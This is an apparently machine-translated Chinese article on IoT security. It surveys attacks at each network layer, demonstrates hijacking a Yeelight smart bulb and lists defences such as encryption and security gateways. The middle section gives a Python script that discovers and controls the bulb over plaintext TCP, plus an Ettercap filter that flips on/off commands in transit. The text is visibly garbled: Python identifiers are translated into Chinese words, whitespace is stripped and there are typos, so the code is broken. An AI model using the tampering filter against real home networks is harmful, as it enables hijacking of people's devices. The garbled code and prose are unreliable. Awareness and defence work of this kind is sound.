01物联网安全防御机制与手段1.感知层安全问题(1)物理安全和信息采集安全。感知层是物联网的网络基础,由具体的感知设备组成。感知层的安全问题主要是指感知节点的物理安全和信息采集的安全。(2)典型的攻击技术。感知层的攻击主要来自节点的信号干扰或信号窃取。典型的攻击技术包括阻塞攻击、伪装攻击、重放攻击和中间人攻击。常见的感知层安全措施如下。略读:在终端设备或RFID持卡人不知情的情况下读取信息。窃听:在信道中间,信息被中途截获。欺骗:伪造和复制设备数据,并以假名将其输入系统。克隆:终端设备的克隆、模拟。杀戮:损坏或窃取终端设备。干扰:伪造数据导致设备被阻塞和不可用。屏蔽:通过机械方式屏蔽电信号,使两端无法连接。2.网络层的安全问题网络层主要实现物联网信息的转发和传输,包括网络拓扑和网络路由协议。路由协议和网络拓扑结构的漏洞可以用来攻击网络层。(1)物联网接入安全。为实现不同类型传感器信息的快速传输和共享,物联网采用了移动互联网、有线网络、Wi-Fi、WiMAX等多种网络接入技术。网络接入层的异构性使得如何为终端提供位置管理以保证异构网络间节点漫游和业务的无缝连接,以及不同网络间通信时的安全认证、访问控制等安全问题随之而来。跨异构网络攻击是指在上述物联网融合多个传统网络时,利用不同网络之间标准和协议的差异而专门实施的身份伪造和恶意代码攻击。攻击、伪装和欺骗等网络攻击技术。(2)信息传输安全。物联网信息传输主要依靠传统的网络技术。典型的网络层攻击技术主要有邻居发现协议攻击、虫洞攻击和黑洞攻击。邻居发现协议攻击。利用IPv6中的邻居发现协议(NeighborDiscoveryProtoc01),目标攻击节点可以为其提供路由连接,使目标节点无法获得正确的网络拓扑感知,达到使目标节点过载或阻塞网络的目的,例如洪水攻击。3、应用层安全问题应用层主要是指基于物联网服务和支撑数据的各种应用平台,如云计算、分布式系统、海量信息处理等。但是,这些支撑平台必须建立高效、可靠、可信的应用服务,需要建立相应的安全策略或相对独立的安全架构。典型的攻击技术包括软件漏洞攻击、病毒攻击和拒绝服务流攻击。02智能家居安全控制攻击实例智能家居是目前典型的物联网应用行业。以小米Wi-Fi智能灯泡为例,通过自主实验分析智能家居系统潜在的安全风险。使用YeelightLED智能灯泡,按照官网说明,在其App中即可开启极客模式。也有相应的官方说法。Yeelight第三方控制协议是为科技爱好者推出的功能。市面上所有的YeelightWi-Fi照明设备(YeelightwhitelightbulbYeeilghtcolorbulb)及后续的Wi-Fi产品都将支持该协议。基于这个协议,用户可以选择自己喜欢的语言和平台来开发自己的应用程序来发现和控制YeelightWi-Fi设备。该协议使用类似于SSDP的发现机制和基于JSON的控制命令,允许开发人员发现和控制同一局域网内的设备。需要注意的是,该协议是基于明文传输的,设备的安全取决于用户路由器的安全。因此,在使用本协议时,用户需要对自己设备的安全负责。1、SSDP协议是一种不需要对网络设备服务进行任何配置、管理和维护的机制。该协议是使用基于通知和发现路由的多播发现来实现的。协议客户端在保留的多播地址239.255.255.250:1900(IPv4)(IPv6地址为FF0x::C)发现服务,每个设备服务也在该地址上侦听服务发现请求。如果该服务侦听与该服务匹配的发现请求,该服务将使用单播进行响应。常见的协议请求消息有两种,第一种是服务通知,设备和服务使用这种通知消息来声明自己的存在;第二个是查询请求,协议客户端使用这个请求来查询某些类型的设备和服务。请求消息中包含设备特定的信息或关于某项服务的信息,例如设备类型、标识符和指向设备描述文档的URL地址。Yeelight采用了类似的协议,发现查询流程如图1所示。图1查询流程2.自定义开发用Python编写了发现控制脚本。核心代码如下。defstart(self):self.__send_search()whileTrue:#rlist,wlist,xlistreads,_,_=select.select([self.__s],[],[],5)ifreads:data,addr=self.__s.recvfrom(2048)list_data=data.split('\r\n')IP=""PORT=""ID=""foriteminlist_data:temp=item.split(':')iftemp[0]=="位置":print"IP:"+temp[2].replace("//","")print"PORT:"+temp[3]IP=temp[2].replace("//","")PORT=temp[3]iftemp[0]=="id":print"ID"+temp[1]ID=temp[1]self.operate(IP,PORT,ID)breakelse:#timeoutself.__send_search()self.__s.close()控件的核心代码如下,可见其操作是通过TCP明文进行的。defeperate(self,ip,port,id):print'='*30port=int(port)#printtype(port)try:self.__s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)exceptsocket.error,味精:print'Failedtocreatesocket.Errorcode:'+str(msg[0])+',Errormessage:'+msg[1]sys.exit();print'SocketCreated'self.__s.connect((ip,port))print"connected"#msg='{"id":233,"method":"set_power","params":["on","smooth",1500]}\r\n'xx=0whilexx<1000:#获取远程接口状态try:url_data=urllib2.urllib2.urlopen(JSON_ADDRESS).readline()exceptException,e:printe#printurl_datastatus=json.loads(url_data)['status']printstatus#exit()msg='{"id":'+str(time.time())+',"method":"set_power","params":["'+status+'","smooth",100]}\r\n'printmsgtry:self.__s.sendall(msg)reply=self.__s.recv(4096)printreplyexceptsocket.error:print'Sendfailed'sys.exit()time.sleep(1)xxxx=xx+1打印“完成”自我。__s.close()如果我们在局域网中采用中间人攻击用于篡改TCP数据包,可以实现控制反转。用户发送打开命令。倒置后,Yeelight灯泡收到关闭命令。Ettercap用于中间人攻击。核心篡改代码如下。if(ip.proto==TCP&&tcp.dst==55443){if(search(DATA.data,"set_power")){if(search(DATA.data,"off")){replace("off","on");}else{replace("on","off");}}}这样就实现了控制反转。这里提出这个例子是为了提醒物联网中最常见的安全问题之一,确保数据在网络中的传输不被篡改或窃听。03物联网安全防御机制与手段物联网产业即将进入爆发期,我国在物联网信息安全技术方面的安全可控性还比较薄弱。在传感器技术方面,我国主要侧重于低端传感器的研究和产品开发。中高端传感器产业几乎100%从国外进口,90%以上的芯片依赖国外;在RFID技术方面,我国的低频和高频技术都比较成熟。但UHF和微波频段产品与国外技术差距较大;在M2M等网络层技术方面,我国与国外基本同步,都处于研究阶段;在信息安全共性技术方面,我国开展了相关研究工作,但与国外相比,也存在较大差距。例如RSA推出了针对RFID的安全认证和访问管理产品,国内的信息安全公司还没有生产出类似的产品。在物联网无线通信方面,我国面临信息安全挑战,需要尽快解决。一般企业直接采用加密等方式,但相关规定并不完善,需要政府出台相应的标准和规范。同时,还要做好物联网信息安全顶层设计,加强物联网信息安全技术研发,有效保障互联网应用安全。物联网,遵循“同步规划、同步建设、同步运行”的原则,确保物联网持续发展。发展路径。目前,与金融和电子商务等其他行业相比,物联网安全性尚未得到充分理解和明确定义。在开发物联网产品时,无论是可穿戴设备这样的小型产品,还是油田传感器网络或全球配送运营这样的大型物联网部署,都必须从一开始就考虑安全性。要了解安全问题,就需要了解物联网设备的攻击方式,通过研究攻击方式来提高物联网产品的防御能力。具体来说,除了传统的信息安全防护技术,物联网的安全防御还可以从以下几个方面加强。代码强化。由于远程访问、操作等智能终端的代码量小,易于传播和重复使用,因此首先需要对代码进行慎重处理,并建立代码的安全审查制度。其次,智能终端芯片或嵌入式模块往往缺乏安全保护,容易被逆向。因此,有必要加强代码加固手段,防止代码被破解、分析和植入。通信加密。射频和蓝牙等数据通信协议通常以各种版本实现。为了实现最快速的部署,开发者往往忽略通信加密,导致数据包被分析破解。因此,可以使用AES、SSL/TLS等标准化的加密算法或协议,或者自行开发加密方案。安全网关。智能家居通常直接采用无线路由的接入方式,支持多个物联网智能终端的快速接入。此类接入设备极有可能被黑客劫持,因此有必要开发部署物联网安全网关。验证。随着物联网应用的普及,每个人都可能成为智能手环、可穿戴设备、智能钥匙等终端节点的持有者。建立安全、便捷的统一身份认证体系变得越来越重要。生物识别、行为大数据分析、云认证服务有望解决物联网的安全认证问题。漏洞共享。近年来爆发的远程控制摄像机、DDoS等物联网安全事件,很大程度上是因为业界缺乏足够的安全意识和漏洞共享平台。重要的。对情况的意识。可以预见,未来我们身边将部署数以亿计的物联网设备,因此对这些设备进行跟踪监控,及时了解设备运行的安全状态将变得更加重要。目前,Shadon、ZoomEye等全球物联网设备搜索引擎已经出现,也将成为网络空间安全的常态化服务平台。
